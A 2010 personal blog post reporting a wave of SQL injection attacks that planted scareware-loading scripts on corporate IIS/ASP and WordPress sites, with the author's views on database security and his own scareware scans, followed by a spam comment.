Saturday, June 12, 2010

Wave of "SQL injection" attacks, loading scareware, reported recently against some major companies; also Wordpress sites get attacked

On Friday June 11, at midday, Webroot sent a tweet advising followers of a new wave of malware attacks on major corporate sites with a technique called “SQL injection”. The source story is by Angela Moscaritolo, and is titled “New wave of website attacks seek to spread malware”, with link in SC Magazine here.  One company providing news about this wave is Sucuri Security (website ) which offers services protecting websites from hacks and blacklisting. A blog at this website has an entry yesterday giving a technical explanation of the attacks. The title of the posting is “Mass infection of IIS/ASP sites – 2677.in/yahoo.js”. The blog posting names some major corporate sites attacked, including Ameristar, servicewomen, Chicago Public Radio, Industry Week, Book Seller and Publisher, and Spain Holiday. (No, I won’t give links to the urls!) The posting also displays the source code of the yahoo.js script (which loads the malware from “2677.in/ie.html”) and shows a demonstration sucuri scan against Ameristar. On June 8, Sucuri had reported a number of sites infected with a similar hack to “robint.us/u.js”.

Microsoft is saying that the hacks demonstrate vulnerabilities from third party applications and not with asp or iis itself. Nevertheless, next week I would expect more big patches from Microsoft (with the lengthy restart and reboot times at home!).

The SC Magazine article has a link to another story by the same writer, “Widespread attacks continue against Wordpress sites” and some other sites based on PHP platforms. Sites hosted by a number of well known WP hosts were affected, and these include DreamHost, GoDaddy, Bluehost, Media temple and HostGator. I had discussed these hosts for WordPress on a March 11, 2010 posting on my “IT Job Market” blog (see my Profile). WordPress might have become vulnerable because it often uses MySQL, which could open it to SQL injection attacks. Blogger does not seem to have been implicated, since it has a different kind of database engine.

To my knowledge, IBM mainframe database DB2 (and similar mainframe products) has not been vulnerable to this sort of attack, and I have never encountered a discussion of it in a textbook or encountered a question about it on a Brainbench certification test. IBM mainframe security for database products still seems a leap ahead of many Unix and especially Windows-related products, and this should be born in mind by companies (and government agencies) where security breaches would be disastrous (as with banks). This is true even though direct-connect to DB2 from the web is possible (and I have worked with it in the past myself). But from my own experience, Sybase (on Unix plafforms, which I have worked with in conjunction with java and powerbuilder) also provides similar very reliable security, to a degree considerably safer than common with smaller and cheaper SQL databases offered by ISP’s.

A company named Acunetix can scan sites for SQL injection vulnerabilities (link ).

Home (and business) users may experience scareware infection without symptoms.

On Jan. 6, my Vista machine showed scareware fake anti-virus ad, which went away when the browser window was closed. A Webroot scan that day found three viruses (Troj/FakeAvjs.A, Mal/FakeAvJs.A, and Fakealert.gen), and quarantined them. No more symptoms appeared. But on “Blizzard Day” Feb. 6, a Facebook ad would not go away until a browser window was closed. A webroot scan quarantined Troj/ByteVer.g. These trojans seem related to the “New York Times” case last September.

Scareware SQL-injections seem to have been going on since the summer of 2009, judging from quick searches.

It’s advisable to run anti-virus scans frequently, especially after data definition files have been updated or new anti-virus engines have been installed. These may detect and quarantine scareware trojans not causing symptoms. To date, it seems as though ordinary anti-virus scans do remove these trojans. But It seems that “corporate America” – the establishment -- no longer provides completely safe surfing.

1 comment:

jackob said...

I recently came across your blog and have been reading along. I thought I would leave my first comment.
I don't know what to say except that I have enjoyed reading. Nice blog. I will keep visiting this blog very often.
Thank You
PowerBuilder development company